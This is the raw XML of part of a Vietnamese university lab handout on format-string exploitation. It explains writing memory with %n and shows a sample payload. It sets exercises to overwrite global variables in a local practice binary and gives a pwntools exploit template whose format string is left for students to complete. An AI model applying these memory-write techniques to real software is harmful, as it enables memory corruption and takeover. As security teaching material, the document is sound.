        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E663D6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>overwrite addr</w:t>
      </w:r>
      <w:r w:rsidRPr="00021C45">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A0D1FC6" w14:textId="35AE2E9A" w:rsidR="00635B4E" w:rsidRDefault="00A04CA8" w:rsidP="00A04CA8">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t xml:space="preserve">Ví dụ bên dưới, ta đang ghi giá trị 1 vào ô nhớ có địa chỉ </w:t>
      </w:r>
      <w:r w:rsidR="00642CD6" w:rsidRPr="004A25C5">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0x080412AB</w:t>
      </w:r>
      <w:r w:rsidR="00642CD6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t>là tham số thứ k+1 của printf</w:t>
      </w:r>
      <w:r w:rsidR="009A6AC1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t xml:space="preserve">, kí tự ‘a’ </w:t>
      </w:r>
      <w:r w:rsidR="00FE0DF6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t>sẽ đảm bảo</w:t>
      </w:r>
      <w:r w:rsidR="009A6AC1">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t xml:space="preserve"> %n giữ giá trị 1</w:t>
      </w:r>
      <w:r w:rsidR="00F62B8E">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t xml:space="preserve">, 3 ký tự x để </w:t>
      </w:r>
      <w:r w:rsidR="00FE0DF6">
        <w:rPr>
          <w:rStyle w:val="apple-converted-space"/>
        </w:rPr>
        <w:t>thêm padding cho địa chỉ nằm ở vị trí thích hợp sau chuỗi format string.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="174ABF57" w14:textId="7B975123" w:rsidR="00A04CA8" w:rsidRPr="000866EA" w:rsidRDefault="00A04CA8" w:rsidP="00A04CA8">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:pBdr>
          <w:top w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:left w:val="single" w:sz="4" w:space="4" w:color="auto"/>
          <w:bottom w:val="single" w:sz="4" w:space="1" w:color="auto"/>
          <w:right w:val="single" w:sz="4" w:space="4" w:color="auto"/>
        </w:pBdr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000866EA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a%k$nxx</w:t>
      </w:r>
      <w:r w:rsidR="009A6AC1" w:rsidRPr="000866EA">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidR="00642CD6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\xAB\x12\x0</w:t>
      </w:r>
      <w:r w:rsidR="00D66AE4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00642CD6">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>\x0</w:t>
      </w:r>
      <w:r w:rsidR="00D66AE4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFC8936" w14:textId="77777777" w:rsidR="00A04CA8" w:rsidRPr="00707F49" w:rsidRDefault="00A04CA8" w:rsidP="008D4D4C">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="2"/>
          <w:szCs w:val="2"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pP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A04CA8" w14:paraId="131842E5" w14:textId="77777777" w:rsidTr="008D4D4C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9495" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="0070C0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="25DC64EB" w14:textId="0252D15C" w:rsidR="00A04CA8" w:rsidRPr="00B46B41" w:rsidRDefault="00A04CA8" w:rsidP="00435DB1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1418"/>
              </w:tabs>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:ind w:left="128" w:firstLine="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">Sinh viên khai thác và truyền chuỗi s để ghi đè biến </w:t>
            </w:r>
            <w:r w:rsidRPr="004A25C5">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>a</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> của file </w:t>
            </w:r>
            <w:r w:rsidRPr="00153D16">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>stack-overwrite</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> thành giá trị 2. Giải thích ý nghĩa của chuỗi định dạng và lý do có thể in được giá trị cần thiết.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F9CE929" w14:textId="5339915C" w:rsidR="00EA3909" w:rsidRPr="00EA3909" w:rsidRDefault="00A04CA8" w:rsidP="00EA3909">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">Gợi ý: a là biến toàn cục đã được gán giá trị, do đó không nằm trên stack mà nằm trong section .data với địa chỉ cụ thể. Có thể </w:t>
      </w:r>
      <w:r w:rsidR="00C626B7">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>info variables để xem</w:t>
      </w:r>
      <w:r w:rsidR="00EA3909" w:rsidRPr="00EA3909">
        <w:rPr>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> địa chỉ của a.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E2CEC7" w14:textId="2DC9855D" w:rsidR="00EF74F8" w:rsidRDefault="00264C13" w:rsidP="00C626B7">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="270E1109" wp14:editId="4E6802C2">
            <wp:extent cx="3127355" cy="175610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41"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3145156" cy="1766101"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D723310" w14:textId="24B6F0CC" w:rsidR="00EF096F" w:rsidRPr="00EF096F" w:rsidRDefault="00A04CA8" w:rsidP="00EF096F">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r>
        <w:t>Sinh viên tham khảo đoạn mã khai thác bên dưới:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9530"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F73D51" w14:paraId="163B2FFC" w14:textId="77777777" w:rsidTr="00F73D51">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9530" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="184821FD" w14:textId="21F4A23D" w:rsidR="00101E70" w:rsidRDefault="00101E70" w:rsidP="006B1079">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>from pwn import *</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2B113058" w14:textId="2ABC63A9" w:rsidR="00F73D51" w:rsidRPr="00A04CA8" w:rsidRDefault="00F73D51" w:rsidP="006B1079">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>def fora():</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4D78601B" w14:textId="29A86D58" w:rsidR="00F73D51" w:rsidRPr="00A04CA8" w:rsidRDefault="00F73D51" w:rsidP="006B1079">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    sh = process('./</w:t>
            </w:r>
            <w:r w:rsidR="002E43C0">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>app-</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>overwrite')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E0BD83B" w14:textId="2164736B" w:rsidR="00F73D51" w:rsidRDefault="00F73D51" w:rsidP="006B1079">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    a_addr =  </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0x</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>0804C024</w:t>
            </w:r>
            <w:r w:rsidR="00A04CA8">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00A04CA8" w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t># address of a</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25AC9389" w14:textId="144511FA" w:rsidR="00A04CA8" w:rsidRPr="00A04CA8" w:rsidRDefault="00A04CA8" w:rsidP="006B1079">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="808080" w:themeColor="background1" w:themeShade="80"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    # format string – change to your answer</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477322E7" w14:textId="78DBC012" w:rsidR="00F73D51" w:rsidRPr="00A04CA8" w:rsidRDefault="00F73D51" w:rsidP="006B1079">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    payload = b'</w:t>
            </w:r>
            <w:r w:rsidR="00A04CA8">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>....</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>%</w:t>
            </w:r>
            <w:r w:rsidR="00A04CA8">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>k</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>$n</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:color w:val="auto"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:color w:val="C00000"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>+ p32(a_addr)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="270EDF19" w14:textId="77777777" w:rsidR="00F73D51" w:rsidRPr="00A04CA8" w:rsidRDefault="00F73D51" w:rsidP="006B1079">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    sh.sendline(payload)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00917A22" w14:textId="77777777" w:rsidR="00F73D51" w:rsidRPr="00A04CA8" w:rsidRDefault="00F73D51" w:rsidP="006B1079">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    print (sh.recv())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4F3DBB" w14:textId="77777777" w:rsidR="00F73D51" w:rsidRDefault="00F73D51" w:rsidP="006B1079">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A04CA8">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    sh.interactive()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="68837562" w14:textId="1E7C89BA" w:rsidR="00101E70" w:rsidRDefault="00101E70" w:rsidP="006B1079">
            <w:pPr>
              <w:pStyle w:val="Code"/>
              <w:spacing w:line="240" w:lineRule="auto"/>
              <w:ind w:firstLine="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>fora()</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="74421500" w14:textId="309B9C03" w:rsidR="00EF096F" w:rsidRPr="00A61CB6" w:rsidRDefault="00B55FAF" w:rsidP="00EF74F8">
      <w:pPr>
        <w:pStyle w:val="Content"/>
      </w:pPr>
      <w:r w:rsidRPr="00A61CB6">
        <w:t>Kết quả chạy mã khai thác</w:t>
      </w:r>
      <w:r w:rsidR="000C2007">
        <w:t xml:space="preserve"> như bên dưới là thành công.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DD4251B" w14:textId="3EDA595F" w:rsidR="00F73D51" w:rsidRDefault="00264C13" w:rsidP="000C2007">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:iCs/>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="59A358C4" wp14:editId="556C7AC9">
            <wp:extent cx="3886351" cy="1561465"/>
            <wp:effectExtent l="0" t="0" r="0" b="63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42"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3935198" cy="1581091"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="0" w:type="dxa"/>
        <w:tblBorders>
          <w:top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95"/>
      </w:tblGrid>
      <w:tr w:rsidR="00B55FAF" w14:paraId="61736AA8" w14:textId="77777777" w:rsidTr="0072589C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9495" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="36" w:space="0" w:color="0070C0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="DEEAF6" w:themeFill="accent1" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="65DCC4B6" w14:textId="4BCAAA50" w:rsidR="00B55FAF" w:rsidRPr="00B95EB8" w:rsidRDefault="00B55FAF" w:rsidP="00435DB1">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="19"/>
              </w:numPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="1418"/>
              </w:tabs>
              <w:spacing w:before="80" w:after="80" w:line="276" w:lineRule="auto"/>
              <w:ind w:left="128" w:firstLine="0"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00B95EB8">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Sinh viên khai thác và truyền chuỗi s để ghi đè biến </w:t>
            </w:r>
            <w:r w:rsidRPr="009E57C8">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>b</w:t>
            </w:r>
            <w:r w:rsidRPr="00B95EB8">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> của file </w:t>
            </w:r>
            <w:r w:rsidRPr="00B95EB8">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>stack-overwrite</w:t>
            </w:r>
            <w:r w:rsidRPr="00B95EB8">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve"> thành giá trị </w:t>
            </w:r>
            <w:r w:rsidRPr="00B95EB8">
              <w:rPr>
                <w:rStyle w:val="mh"/>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>0x12345678</w:t>
            </w:r>
            <w:r w:rsidRPr="00B95EB8">
              <w:rPr>
                <w:rFonts w:ascii="UVN Viet Sach" w:hAnsi="UVN Viet Sach"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t>. Báo cáo chi tiết các bước phân tích, xác định chuỗi định dạng và kết quả khai thác.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="79260584" w14:textId="77777777" w:rsidR="006B1079" w:rsidRDefault="006B1079" w:rsidP="006831A4">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Lưu ý: b cũng là biến toàn cục.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="638DD458" w14:textId="1C6C131D" w:rsidR="006831A4" w:rsidRDefault="006831A4" w:rsidP="006831A4">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>Kết quả cần đạt được:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406C30AA" w14:textId="57E39B3A" w:rsidR="00264C13" w:rsidRDefault="00264C13" w:rsidP="00B95EB8">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="364DBEBD" wp14:editId="4F80B994">
            <wp:extent cx="3101606" cy="827460"/>
            <wp:effectExtent l="0" t="0" r="381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43"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3129638" cy="834939"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AE4925" w14:textId="1AF9285A" w:rsidR="00FA3239" w:rsidRPr="00AD4CCE" w:rsidRDefault="00185F79" w:rsidP="00F20ED0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>YÊU CẦU</w:t>
      </w:r>
      <w:r w:rsidR="00782D86" w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp; ĐÁNH GIÁ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="501F47AF" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="OLE_LINK23"/>
      <w:bookmarkStart w:id="13" w:name="OLE_LINK24"/>
      <w:r w:rsidRPr="00AD4CCE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve">Yêu </w:t>
      </w:r>
      <w:r w:rsidRPr="003B7E0F">
        <w:t>cầu</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0DEA7A" w14:textId="77777777" w:rsidR="00B55FAF" w:rsidRPr="00AD4CCE" w:rsidRDefault="00B55FAF" w:rsidP="00B55FAF">
      <w:pPr>
        <w:pStyle w:val="Content"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
